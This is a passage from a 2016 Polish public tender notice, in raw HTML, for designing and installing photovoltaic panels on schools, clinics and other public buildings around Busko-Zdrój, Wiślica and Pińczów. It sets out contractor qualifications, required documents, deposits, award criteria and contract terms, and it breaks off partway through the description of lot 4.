b. W ramach jednego zadania projekt instalacji ogniw fotowoltaicznych, o mocy min. 30 kWp, 
których łączna wartość wyniosła, co najmniej 150 000,00 zł brutto.
Do każdej pozycji wykazu należy załączyć dowody określające, czy roboty i usługi te zostały wykonane w sposób należyty, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.
Wykonawca tym samym doświadczeniem może się wykazać do więcej niż jednego zadania, pod warunkiem, że jego sumaryczna moc oraz wartość odpowiada warunkom postawionym przez Zamawiającego dla poszczególnych zadań.
Przykładowo:
Złożenie oferty na zadanie 1, 2 i 3 należy wykazać W ramach jednego zadania instalację ogniw fotowoltaicznych w trybie zaprojektuj i wybuduj, o mocy min. 150 kWp i wartości minimum 1 000 000,00 zł brutto
LUB
łącznie:
a. W ramach jednego zadania instalację ogniw fotowoltaicznych, o mocy min. 150 kWp 
oraz
b. W ramach jednego zadania projekt instalacji ogniw fotowoltaicznych, o mocy min. 150 kWp,
których łączna wartość wyniosła, co najmniej 1 000 000,00 zł brutto.
b) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego.
Na potwierdzenie niniejszego warunku należy złożyć wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje n/w osobami:
Dla Zadania  1-7:
a1) Co najmniej 1 osobą przewidzianą do pełnienia funkcji Kierownika Budowy posiadającą: uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, zgodnie z art.12, art.12a i art.14 Ustawy z dnia 7 lipca 1994r.  Prawo budowlane (tekst jednolity Dz. U. 2016 poz. 290 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
a2) Co najmniej 1 osobą, która posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno  budowlanej, zgodnie z art.12, art.12a i art.14 Ustawy z dnia 7 lipca 1994r.  Prawo budowlane (tekst jednolity Dz. U. 2013 poz. 1409 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
a3) Co najmniej 1 osobą, która posiada uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, zgodnie z art.12, art.12a i art.14 Ustawy z dnia 7 lipca 1994r.  Prawo budowlane (tekst jednolity Dz. U. 2016 poz. 290 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
a4) co najmniej 1 osobą, która posiada projektowe uprawnienia budowlane do wykonywania projektów  w specjalności konstrukcyjno  budowlanej, zgodnie z art.12, art.12a i art.14 Ustawy z dnia 7 lipca 1994r.  Prawo budowlane (tekst jednolity Dz. U. 2016 poz. 290 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
a5) Co najmniej 1 osobą, która posiada uprawnienia instalatora OZE certyfikowaną przez UDT posiadający kwalifikacje do instalowania instalacji fotowoltaicznych.
a6) Co najmniej 1 osobą - Kierownikiem Brygady, którzy musi posiadać: 
1) Autoryzację / świadectwo ukończenia szkolenia w zakresie instalacji paneli PV. 
2) Autoryzację / świadectwo ukończenia szkolenia w zakresie instalacji falowników.
3) Uprawnienia SEP Eksploatacja i Dozór co najmniej do 1 kV.
a7) co najmniej  4 osobami każda zatrudniona w pełnym wymiarze czasu pracy (cały etat) na umowę o pracę, którzy bezpośrednio będą związani z wykonywanymi robotami budowlano-montażowymi na obiektach.
Funkcje osób wymienionych w pkt. a1) do a5) można łączyć pod warunkiem spełniania wymagań łącznie. Przy czym dopuszcza się łączenie przez jedną osobę nie więcej niż dwóch funkcji. W odniesieniu do tych osób do oferty należy dołączyć oświadczenie Wykonawcy, że zaproponowane osoby posiadają wymagane uprawnienia i przynależy do właściwej izby samorządu zawodowego jeżeli taki wymóg na te osoby nakłada Prawo budowlane.
Tymi samymi osobami opisanymi w pkt. od a1) do a6) można wykazać się do wszystkich zadań.
W odniesieniu dla pracowników fizycznych opisanych w pkt. a7) tymi samymi osobami można wykazać się tylko do jednego zadania.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, o których mowa w art. 24 ustawy, wykonawca złoży oświadczenie o braku podstaw wykluczenia oraz przedłoży na potwierdzenie następujące dokumenty;
a) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt.1 ustawy;
b) zaświadczenia właściwego urzędu skarbowego potwierdzającego, że wykonawca  nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
c) zaświadczenia Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 
d) oświadczenia wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716);
2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa powyżej,  składa odpowiednio, że:
a) nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
b) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
c) Dokumenty, o których mowa powyżej w pkt. a) powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, a w pkt. b) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt. a) i b), zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Przepis pkt c) stosuje się odpowiednio.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) Wykaz wykonanych robót budowlanych i usług potwierdzający opisany warunek wraz z dowodami potwierdzającymi należyte wykonanie tych robót i usług zgodnie z opisanym warunkiem 9.4.2 a)
2)Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego zgodnie z opisanym warunkiem 9.4.2 b)
3)Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy zgodnie z opisanym warunkiem 9.4.3 a)
4)Potwierdzenie, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia 9.4.3 b)

 <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania, o których mowa w art. 24 ust. 1 pkt 23 ustawy, wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej której udostępniono SIWZ informacji  o ofertach złożonych w postępowaniu zgodnie z art. 86 ust. 5 ustawy, składa stosownie do treści art. 24 ust. 11 ustawy, oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej oraz, w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wadium w wysokości:
Dla Zadania nr 1: 10 000,00 PLN (dziesięć tysięcy złotych) 
Dla Zadania nr 2: 20 000,00 PLN (dwadzieścia tysięcy złotych) 
Dla Zadania nr 3: 10 000,00 PLN (dziesięć tysięcy złotych) 
Dla Zadania nr 4: 15 000,00 PLN (piętnaście tysięcy złotych) 
Dla Zadania nr 5: 17 000,00 PLN (siedemnaście tysięcy złotych) 
Dla Zadania nr 6: 12 000,00 PLN (dwanaście tysięcy złotych) 
Dla Zadania nr 7: 5 000,00 PLN (pięć tysięcy złotych) 
należy wnieść przed upływem terminu składania ofert.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres udzielonej rękojmi </td><td>30</td></tr><tr><td>Czas reakcji serwisu</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w niżej wymienionych przypadkach: 
1. Zmiana terminu wykonania przedmiotu umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, może nastąpić w przypadkach, gdy opóźnienie terminu wykonania przedmiotu Umowy nie jest zależne od Wykonawcy tj. siła wyższa (np.: klęska żywiołowa, niesprzyjające warunki atmosferyczne).  Termin ten zostaje wówczas przedłużony o czas trwania zaistniałych okoliczności  do czasu ustąpienia tych okoliczności. 
2. Zmiana wartości ceny kontraktowej. 
Zamawiający zastrzega sobie prawo do ograniczenia zakresu przedmiotu umowy na skutek okoliczności, których nie można było przewidzieć na etapie przygotowania inwestycji do realizacji - w szczególności jeżeli moc zaprojektowanej instalacji fotowoltaicznej będzie niższa o więcej niż 10% od mocy zakładanej w audycie.  W takim przypadku wartość robót wyłączonych, Zamawiający określał będzie w oparciu o algorytm przyjęty przy wyliczaniu zamówień powtarzających się. 
Wartość robót wyłączonych zostanie ustalona w oparciu o wyłączony zakres przedmiotu zamówienia oraz w  oparciu o stosowne koszty podane w ofercie i załączniku nr 1 do oferty Wykaz cen Budynki Użyteczności Publicznej. 
W takich przypadkach nastąpi zmniejszenie wynagrodzenia umownego o kwoty wynikające z załącznika nr 1 do oferty i ustalenie jego nowej wysokości w aneksie do umowy. 
3. Zmiany warunków umowy powinny nastąpić w formie pisemnej. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 14/11/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej na terenie Powiatu Buskiego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Obiekty objęte zamówieniem: 
1. Zespół Opieki Zdrowotnej w Busku - Zdroju 
- ZOZ Budynek Główny
- ZOZ Oddział Zakaźny 
- ZOZ Oddział Płucny	
ul. Boh. Warszawy 67,28-100 Busko-Zdrój
2. Komenda Powiatowa Państwowej Straży Pożarnej w Busku - Zdroju ul. Waryńskiego 29a,28-100 Busko-Zdrój<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 71300000-1,
                    42510000-4,
                    31122000-7,
                    09330000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres udzielonej rękojmi </td><td>30</td></tr><tr><td>Czas reakcji serwisu</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej na terenie Gminy Busko-Zdrój<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Obiekty objęte zamówieniem: 
1. Szkoła Podstawowa w Szańcu gm. Busko-Zdrój, Szaniec 240, 
28-100 Busko-Zdrój
2. Szkoła Podstawowa w Kołaczkowicach gm. Busko-Zdrój, Kołaczkowice 122, 
28-100 Busko-Zdrój
3. Samorządowe Gimnazjum w Podgajach gm. Busko-Zdrój, Podgaje 92a; 
28-100 Busko Zdrój
4. Publiczne Przedszkole nr 2 w Busko-Zdroju,	osiedle Tadeusza Kościuszki 14, 28-100 Busko-Zdrój
5. Publiczne Przedszkole nr 3 w Busko-Zdroju,	osiedle Gen. Sikorskiego 12, 28-100 Busko-Zdrój
6. Ośrodek Zdrowia w Dobrowodzie gm. Busko-Zdrój	Dobrowoda 24,
28-100 Busko-Zdrój
7. Samodzielny Publiczny Zespół Podstawowej Opieki Zdrowotnej,	ul Sądowa 9, 28-100 Busko-Zdrój
8. Ośrodek Zdrowia w Kołaczkowicach gm. Busko-Zdrój	Kołaczkowice 11,
28-100 Busko-Zdrój
9. Miejsko-Gminna Biblioteka Publiczna w Busko-Zdroju	osiedle Gen. Świerczewskiego 17, 28-100 Busko-Zdrój
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 71300000-1,
                    42510000-4,
                    31122000-7,
                    09330000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres udzielonej rękojmi </td><td>30</td></tr><tr><td>Czas reakcji serwisu</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej na terenie Gminy Wiślica<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Obiekty objęte zamówieniem: 
1. Samorządowy Zakład Opieki Zdrowotnej w Wiślicy Kilińskiego 19, 
28-160 Wiślica
2. Zespół szkolno-przedszkolny z halą sportową Wiślica	Podwale 1, 
28-160 Wiślica
3.Oczyszczalnia ścieków w Jurkowie Jurków 28-160 Wiślica<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 71300000-1,
                    42510000-4,
                    31122000-7,
                    09330000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres udzielonej rękojmi </td><td>30</td></tr><tr><td>Czas reakcji serwisu</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej na terenie Gminy Pińczów<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Obiekty objęte zamówieniem: 
